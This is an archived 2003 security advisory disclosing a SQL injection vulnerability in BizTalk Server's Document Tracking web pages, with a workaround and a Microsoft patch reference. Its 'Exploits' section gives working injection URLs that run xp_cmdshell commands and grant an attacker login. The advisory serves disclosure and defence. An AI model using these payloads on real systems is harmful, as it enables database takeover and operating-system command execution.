Security Advisory Name: Microsoft Biztalk Server Document Tracking and Admnistration vulnerable to SQL injection System Affected : BizTalk Server 2000 and BizTalk Server 2002 Severity : High Remote exploitable : Yes Author: Cesar Cerrudo. Date: 05/05/03 Advisory Number: CC040302 Legal Notice: This Advisory is Copyright (c) 2003 Cesar Cerrudo. You may distribute it unmodified and for free. You may NOT modify it and distribute it or distribute parts of it without the author's written permission. You may NOT use it for commercial intentions (this means include it in vulnerabilities databases, vulnerabilities scanners, any paid service, etc.) without the author's written permission. You are free to use Microsoft bulletin's details for commercial intentions. Disclaimer: The information in this advisory is believed to be true though it may be false. The opinions expressed in this advisory are my own and not of any company. The usual standard disclaimer applies, especially the fact that Cesar Cerrudo is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory. Cesar Cerrudo bears no responsibility for content or misuse of this advisory or any derivatives thereof. Overview: Microsoft Biztalk Server is a Microsoft product for business-process automation and application-integration both within and between businesses. BizTalk Server provides a powerful Web-based development and execution environment that integrates loosely coupled, long-running business processes, both within and between companies. BizTalk Server features include integration among existing applications; the definition of document specifications and specification transformations; and the monitoring and logging of run-time activity. The server provides a standard gateway for sending and receiving documents across the Internet, as well as providing a range of services that ensure data integrity, delivery, security, and support for the BizTalk Framework and other key document formats. Microsoft BizTalk Server provides the ability for administrators to manage documents via a Document Tracking and Administration (DTA) web interface. A SQL Injection vulnerability exists in some of the pages used by DTA that could allow an attacker to send a crafted URL query string to a legitimate DTA user and to execute a malicious embedded SQL statement in the query string. Details: BizTalk Document Tracking and Administration is a stand-alone Web application that you can use to view interchanges and documents that you configured to be tracked in Microsoft BizTalk Server. Biztalk Server uses SQL Server as a backend database server. Only members of Windows administrators or BizTalk Server Report Users local groups are granted by default to use Biztalk Document Tracking and Administration user interface and view tracked documents. The web application authenticate users by Windows authentication, the credentials are also used to authenticate to SQL Server. The web application is located at: http://server/biztalktracking/ There are two ASP pages on the web application that connect from server side to SQL Server that are vulnerable to SQL injection: http://server/biztalktracking/rawdocdata.asp http://server/biztalktracking/RawCustomSearchField.asp Exploits: http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.xp_cmdshell 'any OS command'-- http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.xp_cmdshell 'any OS command'-- or http://server/biztalktracking/rawdocdata.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.sp_grantlogin 'domain\attacker'-- http://server/biztalktracking/RawCustomSearchField.asp?nDocumentKey=1,@tnDirection=1;exec master.dbo.sp_grantlogin 'domain\attacker'-- ...etc. There are others ASP and HTML pages in the Web application that connect to SQL Server with activex components from client side that are also vulnerable to SQL injection. But when a user access these pages a warning message is displayed by Internet Explorer with default security settings for Intranet Zone: "This page access data on another domain. Do you want to allow this" Making the explotation harder without alarming the targeted administrators. This vulnerability can be exploited throght XSS or sending an administrator an HTML e-mail, etc. targeting the vulnerable server. Explotation of this vulnerability allows an attacker to complete compromise SQL Server and could lead to further OS compromise. Workaround: Edit ASP and HTML source files to filter malicious input. Vendor Status : Microsoft was contacted 02/14/03, we work together and Microsoft released a fix. Patch Available : http://www.microsoft.com/technet/security/bulletin/MS03-016.asp NEW SECURITY LIST!!!: For people interested in SQL Server security, vulnerabilities, SQL injection, etc., I'm starting a new mailing list. People subscribed to the list received this advisory five days ago!!. Join at: sqlserversecurity-subscribeat_private http://groups.yahoo.com/group/sqlserversecurity/ __________________________________ Do you Yahoo!? The New Yahoo! Search - Faster. Easier. Bingo. http://search.yahoo.com
This archive was generated by hypermail 2b30 : Mon May 05 2003 - 14:12:55 PDT